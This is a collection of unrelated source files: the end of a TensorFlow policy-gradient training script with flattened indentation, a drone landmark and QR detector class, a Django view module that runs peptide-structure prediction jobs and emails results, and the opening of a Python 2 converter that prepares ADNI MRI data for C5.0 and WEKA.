#========================================================================================#
if nn_baseline:
baseline_prediction = tf.squeeze(build_mlp(
sy_ob_no,
1,
"nn_baseline",
n_layers=n_layers,
size=size))
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
# YOUR_CODE_HERE
baseline_targets = tf.placeholder(shape=[None],
dtype=tf.float32,
name='baseline_targets')
baseline_loss = tf.nn.l2_loss(baseline_targets - baseline_prediction)
baseline_update_op = tf.train.AdamOptimizer(learning_rate) \
.minimize(baseline_loss)
#========================================================================================#
# Tensorflow Engineering: Config, Session, Variable initialization
#========================================================================================#
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
sess = tf.Session(config=tf_config)
sess.__enter__() # equivalent to `with sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
ob = env.reset()
obs, acs, rewards = [], [], []
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and animate)
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.05)
obs.append(ob)
ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no : ob[None]})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > max_path_length:
break
path = {"observation" : np.array(obs),
"reward" : np.array(rewards),
"action" : np.array(acs)}
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > min_timesteps_per_batch:
break
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
#====================================================================================#
# ----------SECTION 4----------
# Computing Q-values
#
# Your code should construct numpy arrays for Q-values which will be used to compute
# advantages (which will in turn be fed to the placeholder you defined above).
#
# Recall that the expression for the policy gradient PG is
#
# PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
#
# where
#
# tau=(s_0, a_0, ...) is a trajectory,
# Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
# and b_t is a baseline which may depend on s_t.
#
# You will write code for two cases, controlled by the flag 'reward_to_go':
#
# Case 1: trajectory-based PG
#
# (reward_to_go = False)
#
# Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
# entire trajectory (regardless of which time step the Q-value should be for).
#
# For this case, the policy gradient estimator is
#
# E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
#
# where
#
# Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
#
# Thus, you should compute
#
# Q_t = Ret(tau)
#
# Case 2: reward-to-go PG
#
# (reward_to_go = True)
#
# Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
# from time step t. Thus, you should compute
#
# Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
#
#
# Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
# like the 'ob_no' and 'ac_na' above.
#
#====================================================================================#
# YOUR_CODE_HERE
q_n = []
for path in paths:
r = path['reward']
T = len(r)
if not reward_to_go:
q = [
np.sum(np.power(gamma, np.arange(T)) * r) \
for t in range(T)
]
else:
q = [
np.sum(np.power(gamma, np.arange(T - t)) * r[t:]) \
for t in range(T)
]
q_n.extend(q)
q_n = np.array(q_n)
#====================================================================================#
# ----------SECTION 5----------
# Computing Baselines
#====================================================================================#
if nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current or previous batch of Q-values. (Goes with Hint
# #bl2 below.)
b_n = baseline_prediction.eval(feed_dict={ sy_ob_no: ob_no })
b_n = b_n * np.std(q_n, axis=0) + np.mean(q_n, axis=0)
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
#====================================================================================#
# ----------SECTION 4----------
# Advantage Normalization
#====================================================================================#
if normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
# YOUR_CODE_HERE
# HACK: `+ 1e-8` to `std` to avoid zero-devision
adv_n = (adv_n - adv_n.mean(axis=0)) / (adv_n.std(axis=0) + 1e-8)
pass
#====================================================================================#
# ----------SECTION 5----------
# Optimizing Neural Network Baseline
#====================================================================================#
if nn_baseline:
# ----------SECTION 5----------
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 above.)
# YOUR_CODE_HERE
q_n = (q_n - q_n.mean(axis=0)) / (q_n.std(axis=0) + 1e-8)
baseline_update_op.run(feed_dict={
sy_ob_no: ob_no,
baseline_targets: q_n
})
#====================================================================================#
# ----------SECTION 4----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
feed_data = { sy_ob_no: ob_no, sy_ac_na: ac_na, sy_adv_n: adv_n }
loss_before = loss.eval(feed_dict=feed_data)
update_op.run(feed_dict=feed_data)
loss_after = loss.eval(feed_dict=feed_data)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("LossUpdate", loss_after - loss_before)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
    """CLI entry point: parse arguments and run one train_PG experiment per seed.

    Each experiment is launched in its own subprocess because TensorFlow does
    not tolerate building the training graph repeatedly in a single thread.
    """
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('env_name', type=str)
    parser.add_argument('--exp_name', type=str, default='vpg')
    parser.add_argument('--render', action='store_true')
    parser.add_argument('--discount', type=float, default=1.0)
    parser.add_argument('--n_iter', '-n', type=int, default=100)
    parser.add_argument('--batch_size', '-b', type=int, default=1000)
    parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
    parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
    parser.add_argument('--reward_to_go', '-rtg', action='store_true')
    parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
    parser.add_argument('--nn_baseline', '-bl', action='store_true')
    parser.add_argument('--seed', type=int, default=1)
    parser.add_argument('--n_experiments', '-e', type=int, default=1)
    parser.add_argument('--n_layers', '-l', type=int, default=1)
    parser.add_argument('--size', '-s', type=int, default=32)
    args = parser.parse_args()

    # One timestamped log directory for the whole run; one subdir per seed.
    if not os.path.exists('data'):
        os.makedirs('data')
    run_name = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
    logdir = os.path.join('data', run_name)
    if not os.path.exists(logdir):
        os.makedirs(logdir)

    # ep_len <= 0 means "no episode length cap".
    max_path_length = args.ep_len if args.ep_len > 0 else None

    for experiment in range(args.n_experiments):
        seed = args.seed + 10 * experiment
        print('Running experiment with seed %d' % seed)

        def run_single(seed=seed):
            train_PG(
                exp_name=args.exp_name,
                env_name=args.env_name,
                n_iter=args.n_iter,
                gamma=args.discount,
                min_timesteps_per_batch=args.batch_size,
                max_path_length=max_path_length,
                learning_rate=args.learning_rate,
                reward_to_go=args.reward_to_go,
                animate=args.render,
                logdir=os.path.join(logdir, '%d' % seed),
                normalize_advantages=not args.dont_normalize_advantages,
                nn_baseline=args.nn_baseline,
                seed=seed,
                n_layers=args.n_layers,
                size=args.size
            )

        # Awkward hacky process runs, because TensorFlow does not like
        # repeatedly calling train_PG in the same thread.
        worker = Process(target=run_single, args=tuple())
        worker.start()
        worker.join()


if __name__ == "__main__":
    main()
|
detector.py | # -*- coding:utf-8 -*-
#
# 封装道路二维码红十字等的检测函数,提供接口
# 用于检测和检测后的图片每50张存一次硬盘
#
from cv_detector.landmark_h import detect_h
from cv_detector.landmark import detect_landmark
from cv_detector.redcross import detect_redcross
from cv_detector.road import detect_road
from cv_detector.cv_read import CVRead
from cv_detector.qr import *
import threading
import cv2 as cv
import time
import os
class Detector:
    """Facade over the road / QR / red-cross / landmark / H detectors.

    Pulls frames from a background CVRead reader, runs the requested detector,
    and persists both the raw and the annotated frame to disk in batches of 50.
    Output folders are named after the start-up timestamp so each run gets its
    own directory. NOTE: methods such as ``detect_qr`` deliberately resolve the
    module-level function of the same name (from ``cv_detector.qr``) inside
    their bodies — class attributes are not in method scope in Python.
    """

    def __init__(self):
        self.cvRead = CVRead()
        self.cvRead.start()
        self.frame = None  # most recent raw camera frame
        self.img = None    # most recent annotated (processed) frame
        # Create the picture folders on init, named by timestamp; the
        # timestamp also ends up in the log.
        self._time = time.strftime("%Y:%m:%d %H:%M", time.localtime())
        self.timeArray = time.strptime(self._time, "%Y:%m:%d %H:%M")
        # Unix timestamp, truncated to minute resolution by the round-trip above.
        self.timeStamp = int(time.mktime(self.timeArray))
        # Folders that receive the raw ("origpic") and processed ("propic") images.
        self.origpath = "./picture/" + str(self.timeStamp) + "/origpic/"
        self.propath = "./picture/" + str(self.timeStamp) + "/propic/"
        # Raw and processed frames are buffered and flushed every 50 images.
        self.origlist = []
        self.prolist = []
        if os.path.exists(self.origpath) is False:
            os.makedirs(self.origpath)
        if os.path.exists(self.propath) is False:
            os.makedirs(self.propath)
        self.count_ori = 1  # next filename index for raw frames
        self.count_pro = 1  # next filename index for processed frames
        self.now_time = time.time()
        self.old_time = time.time()
        # Log dictionary; its entries are drawn back onto the images at exit.
        self.log_dict = {}

    def save_all(self, is_exit=False):
        """Buffer the current frames; flush every 50 images or on exit.

        With ``is_exit=True`` the remaining buffer is flushed synchronously and
        the logged telemetry (``log_dict``) is overlaid onto the saved images.
        """
        if self.frame is not None:
            self.origlist.append(self.frame)
        if self.img is not None:
            self.prolist.append(self.img)
        # Program is exiting: save whatever has been buffered so far.
        if is_exit:
            t = threading.Thread(target=self.save_pic, args=(self.prolist, self.origlist))
            t.start()
            t.join()
            self.prolist = []
            self.origlist = []
            # Overlay the log entries back onto the corresponding images.
            # NOTE(review): value appears to be a 3-tuple of tuples —
            # value[1]=(alt, mode), value[0]=(x, y, land_ag, for_ag),
            # value[2]=(text,) — inferred from the format strings; confirm
            # against whoever fills log_dict.
            for key, value in self.log_dict.items():
                count = 1
                src = cv.imread("%s/%d.jpg" % (self.propath, key))
                cv.putText(src, "alt: %d | mode: %s" %
                           (value[1][0], value[1][1]),
                           (10, 30), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
                if value[0][0] is not None:
                    count += 1
                    cv.putText(src, "x: %d | y: %d | land_ag: %d | for_ag: %d" %
                               (value[0][0], value[0][1], value[0][2], value[0][3]),
                               (10, 30 * count), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
                if value[2][0] is not None:
                    count += 1
                    cv.putText(src, value[2][0],
                               (10, 30 * count), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
                cv.imwrite("%s/%d.jpg" % (self.propath, key), src)
            return
        # When the buffer reaches 50 images, flush it to disk asynchronously.
        if len(self.prolist) == 50:
            threading.Thread(target=self.save_pic, args=(self.prolist, self.origlist)).start()
            self.prolist = []
            self.origlist = []

    # Detect the QR code.
    def detect_qr(self):
        self.save_all()
        self.frame = self.cvRead.read()
        self.img, x_bias, y_bias, qr_angle, forward_angle = detect_qr(self.frame)
        return x_bias, y_bias, qr_angle, forward_angle

    # Detect the small square ("回") region on the QR code.
    def detect_small_qr(self):
        self.save_all()
        self.frame = self.cvRead.read()
        self.img, x_bias, y_bias, qr_angle = detect_small_qr(self.frame)
        return x_bias, y_bias, qr_angle

    # Detect the road.
    def detect_road(self):
        self.save_all()
        self.frame = self.cvRead.read()
        self.img, angle, x_bias = detect_road(self.frame)
        if x_bias is not None:
            # -115 and the negated angle are control offsets for the caller;
            # their units are defined by the flight controller — TODO confirm.
            return x_bias, -115, -1 * angle
        else:
            return 0, 0, 0

    # Detect the red cross.
    def detect_redcross(self):
        self.save_all()
        self.frame = self.cvRead.read()
        self.img, x_bias, y_bias = detect_redcross(self.frame)
        return x_bias, y_bias

    # Detect the landing mark.
    def detect_landmark(self):
        self.save_all()
        self.frame = self.cvRead.read()
        self.img, x, y, l_ag, f_ag = detect_landmark(self.frame)
        return x, y, l_ag, f_ag

    # Detect the "H" marker.
    def detect_h(self):
        self.save_all()
        self.frame = self.cvRead.read()
        self.img, x, y, h_ag = detect_h(self.frame)
        return x, y, h_ag

    # Flush the buffered images from memory to disk.
    def save_pic(self, prolist, origlist):
        self.now_time = time.time()
        self.old_time = self.now_time
        # Save the processed pictures and the originals, numbering sequentially.
        for image in prolist:
            cv.imwrite(self.propath + str(self.count_pro) + ".jpg", image)
            self.count_pro += 1
        for image in origlist:
            cv.imwrite(self.origpath + str(self.count_ori) + ".jpg", image)
            self.count_ori += 1
        self.now_time = time.time()
        print("save pic........ time: ", self.now_time - self.old_time)
|
views.py | import threading
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.conf import settings
from django.core.mail import EmailMessage
from django.http import JsonResponse
import os
import subprocess
from . import models
from project.settings import BASE_DIR
# index.html file and the upload form
def _submit_job(email, sequence, upload, mode):
    """Create a PeptideStructureData row and launch its prediction thread.

    Returns the new job id. Shared by the file- and sequence-upload branches
    of ``dashboard`` (which previously duplicated this logic verbatim).
    """
    data = models.PeptideStructureData(email=email, sequence=sequence, file=upload, status="SUBMITTED")
    data.save()
    database_object = models.PeptideStructureData.objects.get(id=data.id)
    runback = ThreadingExample()
    thread = threading.Thread(target=runback.run, args=(database_object, mode))
    thread.daemon = True  # don't block server shutdown on a running job
    thread.start()
    return data.id


def dashboard(request):
    """Render index.html; on POST, enqueue a prediction job (file or sequence).

    The template receives ``uploadstatus`` (True/False) and, on success, the
    ``jobID`` the frontend later polls via ``checkStatus``.
    """
    if request.POST and request.FILES:
        # Branch 1: a structure file was uploaded.
        try:
            jobID = _submit_job(str(request.POST.get('email')), "NULL",
                                request.FILES['file'], "file")
            return render(request, "index.html", {'uploadstatus': True, 'jobID': jobID})
        except Exception as e:
            print(e)
            return render(request, "index.html", {'uploadstatus': False, })
    elif request.POST:
        # Branch 2: a raw sequence was pasted into the form.
        try:
            jobID = _submit_job(str(request.POST.get('email')),
                                str(request.POST.get('sequence')), "NULL", "sequence")
            return render(request, "index.html", {'uploadstatus': True, 'jobID': jobID})
        except Exception as e:
            print(e)
            return render(request, "index.html", {'uploadstatus': False, })
    else:
        return render(request, "index.html")
# job status check using ajax
def checkStatus(request):
    """AJAX endpoint: return a job's status and its log file rendered as HTML.

    Expects POST param ``jobid``; non-POST requests are redirected to '/'.
    On any failure the plain string "error" is returned (the frontend treats
    a non-JSON body as failure).
    """
    if not request.POST:
        return redirect('/')
    jobid = request.POST['jobid']
    try:
        database_object = models.PeptideStructureData.objects.get(id=jobid)
        # BUG FIX: the log file handle was never closed; use a context manager.
        text = ""
        with open("media/final/" + str(jobid) + "/log.txt", 'r') as fp:
            for i in fp:
                text = text + "<br/>" + str(i)
        response_data = {
            'response': 'success',
            'result_id': jobid,
            'result_status': database_object.status,
            'result_log': text}
        return JsonResponse(response_data, status=201)
    except Exception as e:
        print("some error " + str(e))
        return HttpResponse("error")
# ajax call to send message to admin from frontend
def contact(request):
    """AJAX endpoint: acknowledge a contact-form message by email.

    Returns "success"/"error" as a plain-text body; non-POST requests are
    redirected to the landing page.
    """
    if not request.POST:
        return redirect("/")
    cname = str(request.POST.get('cname'))
    cemail = str(request.POST.get('cemail'))
    csubject = str(request.POST.get('csubject'))
    cmessage = str(request.POST.get('cmessage'))
    # Echo the submitted fields back to the sender.
    body = ("Hello " + cname + ",\n\nThank you for contacting us. "
            "We will get back to you soon."
            "\n\nYour have provided,\nName : "
            + cname + "\nSubject : " + csubject +
            "\nMessage : " + cmessage +
            "\n\nRegards,"
            "\nAdmin")
    try:
        acknowledgement = EmailMessage("Message received!!!", body,
                                       str(settings.EMAIL_HOST_USER),
                                       [str(cemail), ])
        acknowledgement.send()
    except Exception as e:
        print("Error in contact form." + str(e))
        return HttpResponse("error")
    return HttpResponse("success")
# thread for prediction
class ThreadingExample(object):
    """Background job runner: executes the prediction pipeline for one submission.

    ``run`` is invoked on a daemon thread from the ``dashboard`` view. It keeps
    the job's database row updated (SUBMITTED -> THREAD STARTED -> UNDER
    PROCESS -> COMPLETED/FAILED) and emails the requester at start and finish.
    """

    def __init__(self, interval=1):
        # ``interval`` is currently unused; kept for interface compatibility.
        self.interval = interval

    def run(self, database_object, type):
        # NOTE: the parameter name ``type`` shadows the builtin; kept so the
        # public signature stays unchanged.
        try:
            working_dir = str(BASE_DIR) + "/media/modelData/"
            # Per-job result directory, named after the database row id.
            result_path = str(BASE_DIR) + "/media/final/" + str(database_object.id) + "/"
            if not os.path.exists(result_path):
                os.makedirs(result_path)
            email = database_object.email
            models.PeptideStructureData.objects.filter(id=database_object.id).update(status='THREAD STARTED')
            from_email = settings.EMAIL_HOST_USER
            to_list = [email, ]
            send_email_started = EmailMessage("ML Tool - Job " + str(database_object.id) + " started!!!", "Hello Sir/Ma'am,\n\nWe have received "
                                              "your file "
                                              "and we are processing it.\n"
                                              "Have patience.\n\nJob ID : " + str(database_object.id) +
                                              "\n\nRegards,\nAdmin\nMLTool",
                                              str(from_email), to_list)
            send_email_started.send()
            models.PeptideStructureData.objects.filter(id=database_object.id).update(status='UNDER PROCESS')
            # Build the worker command for a file- vs sequence-based submission.
            if type == "file":
                file_path = str(BASE_DIR) + "/" + str(database_object.file)
                command = ["python", working_dir + "mainFile.py", working_dir, file_path, result_path]
            else:
                sequence = str(database_object.sequence)
                command = ["python", working_dir + "mainSequence.py", working_dir, sequence, result_path]
            status = 0
            try:
                # NOTE(review): a nonzero exit code from the script still marks
                # the job COMPLETED; only a failure to *launch* (OSError) flips
                # it to FAILED — TODO confirm this is intended.
                print(subprocess.call(command))
                models.PeptideStructureData.objects.filter(id=database_object.id).update(status='COMPLETED')
            except OSError:
                status = 1
                print("Error in command")
                models.PeptideStructureData.objects.filter(id=database_object.id).update(status='FAILED')
            # Mail the result.
            print(str(status))
            if int(status) == 0:
                # Completed successfully: attach log and predictions.
                send_email = EmailMessage("ML Tool - Process Completed!!!", "Hello Sir/Ma'am,\n\nCheck the attached "
                                          "files.\n\nRegards,\nAdmin\nMLTool",
                                          str(from_email), to_list)
                # BUG FIX: context managers close the handles even if attach()
                # or a later line raises.
                with open(result_path + "log.txt", 'r') as fp:
                    send_email.attach('log.txt', fp.read(), 'text/plain')
                with open(result_path + "predict_select.csv", 'r') as fp:
                    send_email.attach('result.csv', fp.read(), 'text/plain')
                send_email.send()
            else:
                # Launch failed: attach the log only.
                send_email = EmailMessage("ML Tool - Some error!!!", "Hello Sir/Ma'am,\n\nCheck the attached "
                                          "file.\n\n"
                                          "You can contact us for more details.\n\n"
                                          "Regards,\nAdmin\nMLTool",
                                          str(from_email), to_list)
                with open(result_path + "log.txt", 'r') as fp:
                    send_email.attach('log.txt', fp.read(), 'text/plain')
                send_email.send()
        except Exception as e:
            print(e)
            # BUG FIX: this handler referenced the local ``email``, which is
            # unbound when the failure happens before it is assigned (the
            # resulting NameError masked the real error). Read the address
            # straight from the job row instead.
            send_email = EmailMessage("ML Tool - Some error!!!", "Hello Sir/Ma'am,\n\n"
                                      "We apologize for the inconvenience.\n"
                                      "You can submit it again.\n\n"
                                      "Regards,\nAdmin\nMLTool",
                                      str(settings.EMAIL_HOST_USER), [database_object.email, ])
            send_email.send()
|
adniConverter.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Script that prepares ADNI-data for use with C5.0 and/or WEKA.
Takes a folder of xml files (metadata) and subfolders with .nii files (MRIs),
as downloaded from LONI archives via webbrowser (Java applet).
May perform dimensionality reduction (depending on arguments), and outputs
spec- and data-files for use with systems supplied as arguments.
"""
__author__ = "Eivind Arvesen"
__copyright__ = "Copyright (c) 2014-2015, Eivind Arvesen. All rights reserved."
__credits__ = ["Eivind Arvesen"] # Bugfixers, suggestions etc.
__license__ = "GPL3" # LGPL/GPL3/BSD/Apache/MIT/CC/C/whatever
__version__ = "0.0.3 Alpha"
__maintainer__ = "Eivind Arvesen"
__email__ = "eivind.arvesen@gmail.com"
__status__ = "Prototype" # Prototype/Development/Production
__date__ = "2015/03/31 03:43:40 CEST"
__todo__ = [
"In some serious need of generalizations/modularizations...",
"Create logging method, so that the script doesn't fail"
"silently or just quit...",
"Check/try/error that number of XML and NIFTI are alike?",
"Check that no return values (from methods) are empty...",
]
__bug__ = "None"
# Copyright (c) 2014-2015 Eivind Arvesen. All rights Reserved.
from itertools import izip_longest
from scipy import ndimage as nd
from sys import exit
import argparse
import collections
import copy_reg
import cPickle as pickle
import errno
import glob
import fnmatch
import multiprocessing as mp
import nibabel as nib
import numpy as np
import os
import re
import sys
import types
import xml.etree.cElementTree as ET
def _reduce_method(m):
    """Make instance methods pickleable (Python 2 copy_reg reducer).

    Bound methods pickle as (owner instance, function name); unbound methods
    pickle as (owner class, function name). Both reconstruct via getattr.
    """
    owner = m.im_class if m.im_self is None else m.im_self
    return getattr, (owner, m.im_func.func_name)


copy_reg.pickle(types.MethodType, _reduce_method)
class AdniConverter(object):
"""
Convert ADNI dataset (MRI, NIfTI) to various formats.
DESCRIBE PARAMS, METHODS, ETC.
"""
input_folder = None
file_stem = None
out_folder = {}
outformat = None
reduction = None
reduction_dict = {"P": {"name": "PCA", "value": 20},
"H": {"name": "Histogram", "value": 32}}
n_slices = None
visits = None
outfiles = []
logging = True
visits_dict = {
0: "ADNI1 Screening",
1: "ADNI1/GO Month 6",
2: "ADNI1/GO Month 12",
3: "ADNI1/GO Month 18",
4: "ADNI1/GO Month 24",
5: "ADNI1/GO Month 36",
6: "No Visit Defined"
}
out_dict = {
"C": {"filesuffix": ".data", "fileformat": "C5.0"},
"D": {"filesuffix": ".log", "fileformat": "DEBUG"},
"V": {"filesuffix": ".csv", "fileformat": "CSV"},
"W": {"filesuffix": ".arff", "fileformat": "WEKA"}
}
new_resolution = (192, 192, 160)
third_dim = None
dx_groups = {}
max_size = None
merge = None
merge_dict = [
"Normal,MCI,LMCI,AD",
"Normal,MCI,AD",
"Normal,Other",
"Other,MCI",
"Other,AD"
]
    def __init__(self):
        """Initialize. Handle args, check that ouput-files does not exist.

        Parses the command line, prepares the per-merge-group output folders
        and empty output files, then fans the XML/NIfTI conversion out over a
        multiprocessing pool with a single dedicated writer process.
        """
        # Silence divide-by-zero warnings that PCA triggers on constant slices.
        np.seterr(divide='ignore', invalid='ignore')
        # fix PCA divide by zero "errors"...
        parser = argparse.ArgumentParser(description='A script for converting (a subset of) the ADNI1/GO MRI dataset to a format that is compatible with C5.0 or WEKA.\nOutputs to relative path "Converted/<attributes>"', prog='ADNI Converter', formatter_class=argparse.RawDescriptionHelpFormatter, epilog='''\n
VISITS [-i] (ACCEPTED ARS, INCLUSIVE UPPER BOUND) | MERGED [-x] DX GROUPS
0 : ADNI1 Screening | 0: Normal / MCI / LMCI / AD
1 : ADNI1/GO Month 6 | 1: Normal / MCI / AD
2 : ADNI1/GO Month 12 | 2: Normal / Other
3 : ADNI1/GO Month 18 | 3: Other / MCI
4 : ADNI1/GO Month 24 | 4: Other / AD
5 : ADNI1/GO Month 36 |
6 : No Visit Defined |
''')
        parser.add_argument(
            '-c', '--clean', help='remove any previous output',
            action='store_true', default=False)
        parser.add_argument(
            '-d', '--directory', required=True, help='directory to use',
            action='store')
        parser.add_argument(
            '-f', '--format', nargs='*', choices=['C', 'V', 'W'],
            default=['C', 'V'], help='Output format (C5.0, CSV, Weka)',
            action='store')
        parser.add_argument(
            '-g', '--getInfo',
            help='Show amount of images from visits and exit',
            action='store_true', default=False)
        parser.add_argument(
            '-i', '--visits', type=int,
            help='Latest visit to include (int <=6)', action='store')
        parser.add_argument(
            '-m', '--maxSize', type=float,
            help='Maximum output file size (in GiB)',
            action='store')
        parser.add_argument(
            '-n', '--slices', type=int, default=1, help='Use every Nth slice',
            action='store')
        parser.add_argument(
            '-r', '--reduction', choices=['P', 'H'], default=None,
            help='Method used for dimensionality reduction (PCA, Histogram)',
            action='store')
        parser.add_argument(
            '-s', '--scale', type=int, default=(192, 192, 160),
            help='Resolution to downscale to (x,y,z)', action='store', nargs=3)
        parser.add_argument(
            '-v', '--version', help='display version',
            action='version', version='%(prog)s ' + __version__)
        parser.add_argument(
            '-x', '--mergeGroups', type=int, nargs='*',
            help='Merge DX groups (int <=4)', action='store')
        self.args = parser.parse_args()
        self.input_folder = self.args.directory
        # -g: just print the visit/diagnosis tallies and quit.
        if self.args.getInfo:
            self.getInfo()
            sys.exit(0)
        # Default visit range: everything when a size cap bounds the output,
        # otherwise screening visits only.
        if self.args.visits is not None:
            self.visits = self.args.visits
        else:
            if self.args.maxSize:
                self.visits = 6
            else:
                self.visits = 0
        if self.args.maxSize:
            self.max_size = self.args.maxSize
        self.new_resolution = tuple(self.args.scale)
        self.new_dimensions = self.args.scale
        # Slice skipping shrinks the first dimension of the output vector.
        if self.args.slices:
            self.n_slices = self.args.slices
            self.new_dimensions[0] = self.new_dimensions[0] / self.n_slices
        # Dimensionality reduction replaces the third dimension with the
        # component/bin count; histograms collapse the other two to 1.
        if self.args.reduction is not None:
            self.reduction = self.args.reduction
            self.new_dimensions[2] = self.reduction_dict[
                self.reduction]["value"]
            if self.reduction == "H":
                self.new_dimensions[1], self.new_dimensions[0] = 1, 1
        if self.args.mergeGroups is not None:
            self.merge = [x for x in self.args.mergeGroups]
        else:
            self.merge = [0]
        self.dx_groups = {x: {} for x in self.merge}
        # Last non-empty path component of the input folder names the output.
        self.file_stem = filter(lambda x: not re.match(
            r'^\s*$', x),
            [x.strip() for x in self.input_folder.split('/')])[-1]
        try:
            os.makedirs("Converted/")
        except OSError, e:
            if e.errno != errno.EEXIST:
                raise IOError('Error encountered during file creation.')
        for mergeGroup in self.merge:
            # Use os.path.join() — last time the separator ended up as part of
            # the file/folder name... (translated from Norwegian)
            self.out_folder.update({mergeGroup:
                                    "Converted/" + self.file_stem +
                                    "_visits-" + str(self.visits) +
                                    "_nSlices-" + str(self.n_slices) +
                                    "_reduction-" +
                                    str(self.reduction) + "_scale-" +
                                    str(self.new_resolution[0]) + "x" +
                                    str(self.new_resolution[1]) + "x" +
                                    str(self.new_resolution[2]) +
                                    "_mergeGroups-" + str(mergeGroup) + "/"})
            try:
                os.makedirs(self.out_folder[mergeGroup])
            except OSError, e:
                if e.errno != errno.EEXIST:
                    raise IOError('Error encountered during file creation.')
        self.outfiles = list(self.out_dict[x.upper()]['filesuffix'] for x in self.args.format)
        if ("C" in self.args.format):
            self.outfiles.append(".names")
        if ("D" not in self.args.format):
            self.outfiles.append(".log")
        # -c: delete previous output for the chosen attribute combination.
        if self.args.clean:
            for mergeGroup in self.merge:
                for outfile in self.outfiles:
                    for fl in glob.glob(self.out_folder[mergeGroup] +
                                        self.file_stem + outfile):
                        try:
                            os.remove(fl)
                        except OSError, e:
                            raise IOError('Could not remove previous files.')
            print "Removed any and all previous output files."
        # Refuse to clobber existing output; otherwise create empty files.
        for mergeGroup in self.merge:
            for outfile in self.outfiles:
                if os.path.isfile(self.out_folder[mergeGroup] +
                                  self.file_stem + outfile):
                    print "The file " + self.out_folder[mergeGroup] + \
                        self.file_stem + outfile + " already existed."
                    print "Please (re)move it before attempting to run this \
script again."
                    print "Exiting..."
                    exit(1)
                else:
                    with open(self.out_folder[mergeGroup] + self.file_stem +
                              outfile, 'w') as fout:
                        fout.write('')
            try:
                os.makedirs(self.out_folder[mergeGroup] + "Results/")
            except OSError, e:
                if e.errno != errno.EEXIST:
                    raise
        self.outformat = [x.upper() for x in self.args.format]
        print ""
        print 'Initializing...'
        dict_forms = []
        for format in self.outformat:
            dict_forms.append(self.out_dict[format]['fileformat'])
        ofs = ' + '.join(str(p) for p in dict_forms)
        print ofs + ' format(s) selected.\n'
        print "Using every", self.n_slices, "slice"
        try:
            print "Dimensional reduction via", \
                self.reduction_dict[self.reduction]["name"]
        except Exception, e:
            # self.reduction is None when no -r was given; KeyError lands here.
            print "No dimensional reduction."
        print "Scaling all images to", self.new_resolution
        print "Merging DX groups to scheme(s):"
        for x in self.merge:
            print str(x) + ":", self.merge_dict[x]
        print ""
        # parseXml(TRY return{...}, else fail>log)
        print 'Scanning input folder for XML-files from visits up until', \
            self.visits_dict[self.visits], '...'
        self.allFiles = self.filterFiles(
            self.getXmlFilesInFolder(self.input_folder), self.visits)
        gib_const = 10**9  # 1024**3 # 2**30
        if self.max_size:
            maxSize = self.max_size * gib_const
            print "Will stop writing when largest output-file exceeds limit \
of approximately", self.__greek__(maxSize) + "B."
        else:
            maxSize = float("inf")
        cores = mp.cpu_count()
        # Detect number of logical (not physical; i.e. HyperThreading) cores
        print "\nDetected", cores, "(virtual/logical) cores."
        p = mp.Pool()
        manager = mp.Manager()
        q = manager.Queue()
